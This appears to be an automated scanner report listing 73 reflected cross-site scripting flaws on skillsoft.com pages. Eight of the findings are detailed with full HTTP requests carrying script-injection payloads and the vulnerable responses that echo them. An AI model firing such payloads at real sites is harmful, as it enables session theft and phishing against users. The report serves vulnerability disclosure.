skillsoft.com, XSS, CWE-79, CAPEC-86, Cross Site Scripting

XSS in skillsoft.com | Vulnerability Crawler Report

Report generated by XSS.CX at Mon Jan 03 07:17:25 CST 2011.


Contents

Loading

1. Cross-site scripting (reflected)

1.1. http://skillsoft.com/Books24x7/Product_Information/Collections/AnalystPerspectives.asp [name of an arbitrarily supplied request parameter]

1.2. http://skillsoft.com/Books24x7/Product_Information/Collections/BusinessPro.asp [name of an arbitrarily supplied request parameter]

1.3. http://skillsoft.com/Books24x7/Product_Information/Collections/ElémentsEssentielsFrançais.asp [name of an arbitrarily supplied request parameter]

1.4. http://skillsoft.com/Books24x7/Product_Information/Collections/EngineeringPro.asp [name of an arbitrarily supplied request parameter]

1.5. http://skillsoft.com/Books24x7/Product_Information/Collections/ExecBlueprints.asp [name of an arbitrarily supplied request parameter]

1.6. http://skillsoft.com/Books24x7/Product_Information/Collections/ExecSummaries.asp [name of an arbitrarily supplied request parameter]

1.7. http://skillsoft.com/Books24x7/Product_Information/Collections/FinancePro.asp [name of an arbitrarily supplied request parameter]

1.8. http://skillsoft.com/Books24x7/Product_Information/Collections/German.asp [name of an arbitrarily supplied request parameter]

1.9. http://skillsoft.com/Books24x7/Product_Information/Collections/GovEssentials.asp [name of an arbitrarily supplied request parameter]

1.10. http://skillsoft.com/Books24x7/Product_Information/Collections/ITIL_B24.asp [name of an arbitrarily supplied request parameter]

1.11. http://skillsoft.com/Books24x7/Product_Information/Collections/ITPro.asp [name of an arbitrarily supplied request parameter]

1.12. http://skillsoft.com/Books24x7/Product_Information/Collections/ManagerSuite.asp [name of an arbitrarily supplied request parameter]

1.13. http://skillsoft.com/Books24x7/Product_Information/Collections/OfficeEssentials.asp [name of an arbitrarily supplied request parameter]

1.14. http://skillsoft.com/Books24x7/Product_Information/Collections/Oracle.asp [name of an arbitrarily supplied request parameter]

1.15. http://skillsoft.com/Books24x7/Product_Information/Collections/Spanish.asp [name of an arbitrarily supplied request parameter]

1.16. http://skillsoft.com/Books24x7/Product_Information/Collections/WellBeingEssentials.asp [name of an arbitrarily supplied request parameter]

1.17. http://skillsoft.com/Books24x7/Product_Information/Collections/default.asp [name of an arbitrarily supplied request parameter]

1.18. http://skillsoft.com/about/awards.asp [name of an arbitrarily supplied request parameter]

1.19. http://skillsoft.com/about/case_studies.asp [name of an arbitrarily supplied request parameter]

1.20. http://skillsoft.com/about/case_studies.asp [order parameter]

1.21. http://skillsoft.com/about/case_studies.asp [sort parameter]

1.22. http://skillsoft.com/about/company_history.asp [name of an arbitrarily supplied request parameter]

1.23. http://skillsoft.com/about/contact/default.asp [name of an arbitrarily supplied request parameter]

1.24. http://skillsoft.com/about/credit_programs/ [name of an arbitrarily supplied request parameter]

1.25. http://skillsoft.com/about/credit_programs/academic_credit_programs/default.asp [name of an arbitrarily supplied request parameter]

1.26. http://skillsoft.com/about/credit_programs/credential_programs/default.asp [name of an arbitrarily supplied request parameter]

1.27. http://skillsoft.com/about/customers.asp [name of an arbitrarily supplied request parameter]

1.28. http://skillsoft.com/about/default.asp [name of an arbitrarily supplied request parameter]

1.29. http://skillsoft.com/about/future_direction.asp [name of an arbitrarily supplied request parameter]

1.30. http://skillsoft.com/about/instructional_design.asp [name of an arbitrarily supplied request parameter]

1.31. http://skillsoft.com/about/management_team.asp [name of an arbitrarily supplied request parameter]

1.32. http://skillsoft.com/about/office_locations.asp [name of an arbitrarily supplied request parameter]

1.33. http://skillsoft.com/about/partners/ [name of an arbitrarily supplied request parameter]

1.34. http://skillsoft.com/about/partners/IT/default.asp [name of an arbitrarily supplied request parameter]

1.35. http://skillsoft.com/about/partners/channel/default.asp [name of an arbitrarily supplied request parameter]

1.36. http://skillsoft.com/about/partners/solutionpartners/default.asp [name of an arbitrarily supplied request parameter]

1.37. http://skillsoft.com/about/press_room/ [name of an arbitrarily supplied request parameter]

1.38. http://skillsoft.com/about/press_room/in_the_news.asp [name of an arbitrarily supplied request parameter]

1.39. http://skillsoft.com/about/press_room/press_releases/December_09_10_Awards.asp [name of an arbitrarily supplied request parameter]

1.40. http://skillsoft.com/about/press_room/press_releases/December_10_10_Financials.asp [name of an arbitrarily supplied request parameter]

1.41. http://skillsoft.com/about/press_room/press_releases/December_13_10_ThomasNelson.asp [name of an arbitrarily supplied request parameter]

1.42. http://skillsoft.com/about/press_room/press_releases/default.asp [name of an arbitrarily supplied request parameter]

1.43. http://skillsoft.com/about/worldwide.asp [name of an arbitrarily supplied request parameter]

1.44. http://skillsoft.com/error.asp [name of an arbitrarily supplied request parameter]

1.45. http://skillsoft.com/privacy.asp [name of an arbitrarily supplied request parameter]

1.46. http://skillsoft.com/products/BES.asp [name of an arbitrarily supplied request parameter]

1.47. http://skillsoft.com/products/KnowledgeCenters/default.asp [name of an arbitrarily supplied request parameter]

1.48. http://skillsoft.com/products/LDC/default.asp [name of an arbitrarily supplied request parameter]

1.49. http://skillsoft.com/products/SLA/default.asp [name of an arbitrarily supplied request parameter]

1.50. http://skillsoft.com/products/SkillChoice_Solutions.asp [name of an arbitrarily supplied request parameter]

1.51. http://skillsoft.com/products/SkillPort/default.asp [name of an arbitrarily supplied request parameter]

1.52. http://skillsoft.com/products/SkillSoft_Select.asp [name of an arbitrarily supplied request parameter]

1.53. http://skillsoft.com/products/course_collections/IT_professional.asp [name of an arbitrarily supplied request parameter]

1.54. http://skillsoft.com/products/course_collections/Sun.asp [name of an arbitrarily supplied request parameter]

1.55. http://skillsoft.com/products/course_collections/business_skills.asp [name of an arbitrarily supplied request parameter]

1.56. http://skillsoft.com/products/course_collections/compliance.asp [name of an arbitrarily supplied request parameter]

1.57. http://skillsoft.com/products/course_collections/default.asp [name of an arbitrarily supplied request parameter]

1.58. http://skillsoft.com/products/course_collections/desktop_skills.asp [name of an arbitrarily supplied request parameter]

1.59. http://skillsoft.com/products/course_collections/esh.asp [name of an arbitrarily supplied request parameter]

1.60. http://skillsoft.com/products/course_collections/legal.asp [name of an arbitrarily supplied request parameter]

1.61. http://skillsoft.com/products/course_collections/skillsims.asp [name of an arbitrarily supplied request parameter]

1.62. http://skillsoft.com/products/custom_content/SkillStudio.asp [name of an arbitrarily supplied request parameter]

1.63. http://skillsoft.com/products/custom_content/custom_solutions.asp [name of an arbitrarily supplied request parameter]

1.64. http://skillsoft.com/products/custom_content/default.asp [name of an arbitrarily supplied request parameter]

1.65. http://skillsoft.com/products/default.asp [name of an arbitrarily supplied request parameter]

1.66. http://skillsoft.com/products/inGenius/default.asp [name of an arbitrarily supplied request parameter]

1.67. http://skillsoft.com/products/live_learning/default.asp [name of an arbitrarily supplied request parameter]

1.68. http://skillsoft.com/products/live_learning/demos.asp [name of an arbitrarily supplied request parameter]

1.69. http://skillsoft.com/products/lms_integration.asp [name of an arbitrarily supplied request parameter]

1.70. http://skillsoft.com/products/virtual_classroom/default.asp [name of an arbitrarily supplied request parameter]

1.71. http://skillsoft.com/search.asp [name of an arbitrarily supplied request parameter]

1.72. http://skillsoft.com/sitemap.asp [name of an arbitrarily supplied request parameter]

1.73. http://skillsoft.com/terms.asp [name of an arbitrarily supplied request parameter]

2. Cookie without HttpOnly flag set

3. Cross-domain Referer leakage

4. Cross-domain script include

4.1. http://skillsoft.com/

4.2. http://skillsoft.com/Books24x7/Product_Information/Collections/AnalystPerspectives.asp

4.3. http://skillsoft.com/Books24x7/Product_Information/Collections/BusinessPro.asp

4.4. http://skillsoft.com/Books24x7/Product_Information/Collections/ElémentsEssentielsFrançais.asp

4.5. http://skillsoft.com/Books24x7/Product_Information/Collections/EngineeringPro.asp

4.6. http://skillsoft.com/Books24x7/Product_Information/Collections/ExecBlueprints.asp

4.7. http://skillsoft.com/Books24x7/Product_Information/Collections/ExecSummaries.asp

4.8. http://skillsoft.com/Books24x7/Product_Information/Collections/FinancePro.asp

4.9. http://skillsoft.com/Books24x7/Product_Information/Collections/German.asp

4.10. http://skillsoft.com/Books24x7/Product_Information/Collections/GovEssentials.asp

4.11. http://skillsoft.com/Books24x7/Product_Information/Collections/ITIL_B24.asp

4.12. http://skillsoft.com/Books24x7/Product_Information/Collections/ITPro.asp

4.13. http://skillsoft.com/Books24x7/Product_Information/Collections/ManagerSuite.asp

4.14. http://skillsoft.com/Books24x7/Product_Information/Collections/OfficeEssentials.asp

4.15. http://skillsoft.com/Books24x7/Product_Information/Collections/Oracle.asp

4.16. http://skillsoft.com/Books24x7/Product_Information/Collections/Spanish.asp

4.17. http://skillsoft.com/Books24x7/Product_Information/Collections/WellBeingEssentials.asp

4.18. http://skillsoft.com/Books24x7/Product_Information/Collections/default.asp

4.19. http://skillsoft.com/EMEA/default.asp

4.20. http://skillsoft.com/about/awards.asp

4.21. http://skillsoft.com/about/case_studies.asp

4.22. http://skillsoft.com/about/company_history.asp

4.23. http://skillsoft.com/about/contact/default.asp

4.24. http://skillsoft.com/about/credit_programs/

4.25. http://skillsoft.com/about/credit_programs/academic_credit_programs/default.asp

4.26. http://skillsoft.com/about/credit_programs/credential_programs/default.asp

4.27. http://skillsoft.com/about/customers.asp

4.28. http://skillsoft.com/about/default.asp

4.29. http://skillsoft.com/about/future_direction.asp

4.30. http://skillsoft.com/about/instructional_design.asp

4.31. http://skillsoft.com/about/management_team.asp

4.32. http://skillsoft.com/about/office_locations.asp

4.33. http://skillsoft.com/about/partners/

4.34. http://skillsoft.com/about/partners/IT/default.asp

4.35. http://skillsoft.com/about/partners/channel/default.asp

4.36. http://skillsoft.com/about/partners/olsa/default.asp

4.37. http://skillsoft.com/about/partners/solutionpartners/default.asp

4.38. http://skillsoft.com/about/press_room/

4.39. http://skillsoft.com/about/press_room/in_the_news.asp

4.40. http://skillsoft.com/about/press_room/press_releases/December_09_10_Awards.asp

4.41. http://skillsoft.com/about/press_room/press_releases/December_10_10_Financials.asp

4.42. http://skillsoft.com/about/press_room/press_releases/December_13_10_ThomasNelson.asp

4.43. http://skillsoft.com/about/press_room/press_releases/default.asp

4.44. http://skillsoft.com/about/worldwide.asp

4.45. http://skillsoft.com/error.asp

4.46. http://skillsoft.com/privacy.asp

4.47. http://skillsoft.com/products/BES.asp

4.48. http://skillsoft.com/products/KnowledgeCenters/default.asp

4.49. http://skillsoft.com/products/LDC/default.asp

4.50. http://skillsoft.com/products/SLA/default.asp

4.51. http://skillsoft.com/products/SkillChoice_Solutions.asp

4.52. http://skillsoft.com/products/SkillPort/default.asp

4.53. http://skillsoft.com/products/SkillSoft_Select.asp

4.54. http://skillsoft.com/products/course_collections/IT_professional.asp

4.55. http://skillsoft.com/products/course_collections/Sun.asp

4.56. http://skillsoft.com/products/course_collections/business_skills.asp

4.57. http://skillsoft.com/products/course_collections/compliance.asp

4.58. http://skillsoft.com/products/course_collections/default.asp

4.59. http://skillsoft.com/products/course_collections/desktop_skills.asp

4.60. http://skillsoft.com/products/course_collections/esh.asp

4.61. http://skillsoft.com/products/course_collections/legal.asp

4.62. http://skillsoft.com/products/course_collections/skillsims.asp

4.63. http://skillsoft.com/products/custom_content/SkillStudio.asp

4.64. http://skillsoft.com/products/custom_content/custom_solutions.asp

4.65. http://skillsoft.com/products/custom_content/default.asp

4.66. http://skillsoft.com/products/default.asp

4.67. http://skillsoft.com/products/inGenius/default.asp

4.68. http://skillsoft.com/products/live_learning/default.asp

4.69. http://skillsoft.com/products/live_learning/demos.asp

4.70. http://skillsoft.com/products/lms_integration.asp

4.71. http://skillsoft.com/products/virtual_classroom/default.asp

4.72. http://skillsoft.com/satisfaction/

4.73. http://skillsoft.com/search.asp

4.74. http://skillsoft.com/sitemap.asp

4.75. http://skillsoft.com/solutions/IT_certification.asp

4.76. http://skillsoft.com/solutions/default.asp

4.77. http://skillsoft.com/solutions/small-to-medium_business.asp

4.78. http://skillsoft.com/terms.asp

5. Email addresses disclosed

5.1. http://skillsoft.com/about/contact/default.asp

5.2. http://skillsoft.com/about/office_locations.asp

5.3. http://skillsoft.com/about/press_room/

5.4. http://skillsoft.com/about/press_room/press_releases/December_09_10_Awards.asp

5.5. http://skillsoft.com/about/press_room/press_releases/December_13_10_ThomasNelson.asp

5.6. http://skillsoft.com/careers/default.asp

5.7. http://skillsoft.com/privacy.asp

5.8. http://skillsoft.com/products/live_learning/default.asp

5.9. http://skillsoft.com/terms.asp



1. Cross-site scripting (reflected)  next
There are 73 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://skillsoft.com/Books24x7/Product_Information/Collections/AnalystPerspectives.asp [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /Books24x7/Product_Information/Collections/AnalystPerspectives.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eebdf"><script>alert(1)</script>ab1c579f3c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Books24x7/Product_Information/Collections/AnalystPerspectives.asp?eebdf"><script>alert(1)</script>ab1c579f3c6=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 47967
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:48:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/Books24x7/Product_Information/Collections/AnalystPerspectives.asp?eebdf"><script>alert(1)</script>ab1c579f3c6=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.2. http://skillsoft.com/Books24x7/Product_Information/Collections/BusinessPro.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /Books24x7/Product_Information/Collections/BusinessPro.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bad5"><script>alert(1)</script>bc7bafa3339 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Books24x7/Product_Information/Collections/BusinessPro.asp?4bad5"><script>alert(1)</script>bc7bafa3339=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 46491
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:49:11 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/Books24x7/Product_Information/Collections/BusinessPro.asp?4bad5"><script>alert(1)</script>bc7bafa3339=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.3. http://skillsoft.com/Books24x7/Product_Information/Collections/ElémentsEssentielsFrançais.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /Books24x7/Product_Information/Collections/El.mentsEssentielsFran.ais.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20033"><script>alert(1)</script>a4fb581aa52 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Books24x7/Product_Information/Collections/El.mentsEssentielsFran.ais.asp?20033"><script>alert(1)</script>a4fb581aa52=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 45910
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:49:02 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/Books24x7/Product_Information/Collections/El.mentsEssentielsFran.ais.asp?20033"><script>alert(1)</script>a4fb581aa52=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.4. http://skillsoft.com/Books24x7/Product_Information/Collections/EngineeringPro.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /Books24x7/Product_Information/Collections/EngineeringPro.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e4db"><script>alert(1)</script>01c4bb5b35a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Books24x7/Product_Information/Collections/EngineeringPro.asp?2e4db"><script>alert(1)</script>01c4bb5b35a=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 46903
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:49:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/Books24x7/Product_Information/Collections/EngineeringPro.asp?2e4db"><script>alert(1)</script>01c4bb5b35a=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.5. http://skillsoft.com/Books24x7/Product_Information/Collections/ExecBlueprints.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /Books24x7/Product_Information/Collections/ExecBlueprints.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 406a1"><script>alert(1)</script>d4ec6ae3e86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Books24x7/Product_Information/Collections/ExecBlueprints.asp?406a1"><script>alert(1)</script>d4ec6ae3e86=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 45997
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:50:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/Books24x7/Product_Information/Collections/ExecBlueprints.asp?406a1"><script>alert(1)</script>d4ec6ae3e86=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.6. http://skillsoft.com/Books24x7/Product_Information/Collections/ExecSummaries.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /Books24x7/Product_Information/Collections/ExecSummaries.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 689e7"><script>alert(1)</script>b76be40a9eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Books24x7/Product_Information/Collections/ExecSummaries.asp?689e7"><script>alert(1)</script>b76be40a9eb=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 48246
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:50:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/Books24x7/Product_Information/Collections/ExecSummaries.asp?689e7"><script>alert(1)</script>b76be40a9eb=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.7. http://skillsoft.com/Books24x7/Product_Information/Collections/FinancePro.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /Books24x7/Product_Information/Collections/FinancePro.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c35e0"><script>alert(1)</script>66f0f950c8f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Books24x7/Product_Information/Collections/FinancePro.asp?c35e0"><script>alert(1)</script>66f0f950c8f=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 45468
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:49:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/Books24x7/Product_Information/Collections/FinancePro.asp?c35e0"><script>alert(1)</script>66f0f950c8f=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.8. http://skillsoft.com/Books24x7/Product_Information/Collections/German.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /Books24x7/Product_Information/Collections/German.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67425"><script>alert(1)</script>d058b7dac87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Books24x7/Product_Information/Collections/German.asp?67425"><script>alert(1)</script>d058b7dac87=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 45941
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:50:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/Books24x7/Product_Information/Collections/German.asp?67425"><script>alert(1)</script>d058b7dac87=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

